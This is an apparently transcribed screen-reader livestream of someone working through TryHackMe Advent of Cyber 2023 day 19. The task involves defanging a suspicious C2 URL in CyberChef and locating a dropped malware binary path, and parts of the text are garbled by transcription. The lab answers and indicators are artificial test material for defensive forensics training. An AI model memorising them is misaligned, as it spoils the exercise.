So yeah, this is just, it's very sort of all over the place. I've searched for the word defang, but it's not finding it, so I guess... Oh, because I mistyped it, that helps. Defang with an N. Let's try if that goes better. Defang URL. Okay, fantastic. Yeah. Boop. So I just clicked that. Did it actually do anything? Nope. All right. What if we bake? Bake shouldn't be needed because we have... we already have auto bake on. For some reason, just clicking it doesn't do it. You need to drag it, and that's not accessible. So that is the annoying bake. So what? Step. Then we go here. We do defang URL. What if I click it? Mouse, does that help? Nope. No, it does not. Okay, so we need to find another tool. If we had a command line version of this, that would probably work better, but given this tool's requirement to drag and drop, which is annoying, yeah, we can't quite figure out what else we need to do here. We have the thing wrapped in brackets. We have the hxxp. One other thing and I'm missing. Cyberchef. What does defang URL do exactly? So if I know what it does, I can just replicate it. Okay. Defang your operation at the bottom to provide access. Yep. To decode and defang URLs from a password protocol document. I just need to see an example of a defanged URL from Cyberchef. Let's see if this Medium article, I hate having to go to Medium, but let's see if this Medium article has an example. hx, it does, okay. So what does it do? How to defang URLs. Replace HTTP with hxxp. Okay. Yeah. Replace SFTP with SFXP. Okay. Surround the period before the TLD with brackets and optionally all periods. Yeah, I've done that. What else? That's all. I did that already. Except I made small x. Do need to be capitalized? McGreedy secret C2 .thm. I don't know what the problem is. This is the right URL.
Speed MHT right bracket dot left bracket 2 CTE AXXP ://M. Speech mode off.
I'm just really quickly looking at my notepad where I stored the strings output. I don't know. I'm gonna figure it out though. So we're gonna go to the next question real quick because I can't seem to figure out why this isn't letting me do. Letting me do it. Am I doing it in the wrong thing? Fully defend the user using Cyberchef. Use a command. What is the suspicious URL? Fully defang the URL using Cyberchef. Did I just not want the protocol? Anyway. After reading the Elfie file, what location is the MySQL server dropped in on the file system? Okay, we haven't looked at that file yet, so let's go do that instead and actually not do something that we can't need to do anything with. I will put the defanged URL in the description once I figure out what it is. Because I'm pretty sure I'm doing this right, but it's not letting me. So let's cat out that file. Wait, here it is. http://McGreedy secret c2.thm insufficient security level. Yeah, no, that's the URL we're meant to be using, so that's the right one. Just something weird with the formatting that we're not quite seeing, which is apparently a thing now. Okay, let's cat out that Elfie file. Elfie. Yeah, there it is. Okay, that's a lot of text. Let's see if we can find out what we need to do.
/8 ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// slash Ubuntu slash space slash. Start marked var slash EFE slash SYSTEM dash EYTHON 3.8 dash UPDATES slash MYSQLSERVER space slash var speech mode off.
I'm going to assume they want the entire full path, including the binary name. Let's see if that's the case. It is. Okay, very cool. So it is slash var slash tmp slash dot system dash python 3.8 dash update with a capital U slash MySQL server without any underscores or anything of the sort. Okay. If you enjoyed this task, feel free to check out the volatility room. Okay, let's just say that we did that. So that is all the questions answered. Let me just give one more look at that URL. Let me put the visible thingy back to the Chrome window for the last bit. I've been better about that, I think, today. Well, anyway, here's the thing. hxxp. What if we just remove... Actually, let me look at the... So, star. Whoa, wait. HTTP... Are they wanting HTTPS? Because it was an HTTP thing, but... They have 5 characters here. McGreedy secret C2. What? Oh, yeah. McGreedy secret C2. I don't know. I don't know. That one just... I'll have to put it in the description because I can't seem to figure out what they want here. I'm pretty sure I did it right, but there might be like one small character that I'm missing or something. I'm looking at the thing one more time. http://McGreedy secret c2.pthm. Yeah. Just in case, I'll copy paste this. There we go.
But no previous radio button. Out a message. Frame edit multi-line. No answer. The answer format. / *** answer format. 5 star / 18 answer format. 32 star edit answer. H. Paste. H. T. P.
So we remove the X's, the T's, putting X's in place. And we put brackets around the dot.
T.
Yeah, that's all we did, and it's not working. So at that point, I don't know what we're missing. Something odd's happening there. Anyway, I'm going to find that out, and I'm going to leave you here for right now, because we are finished with the task for day 19 of the TryHackMe Thingsbooms. TryHackMe Advent of Cyber 2023. I'll see you guys around for the next one tomorrow at day 20. If my OBS lets me click the stop button, that is. Otherwise, we'll be here for a bit longer. What?
Speech, graph, screencast properties, but no filters, but window menu bar, status scenes window, sources window, audio mixer window, scene transitions, wind controls window, stop studio mode check, stop recording checkbox checked. Well,
now you can hear how I do it with if I keyboard navigation fails, I have to use screen reader magic. Anyway, see you next time and have a good day.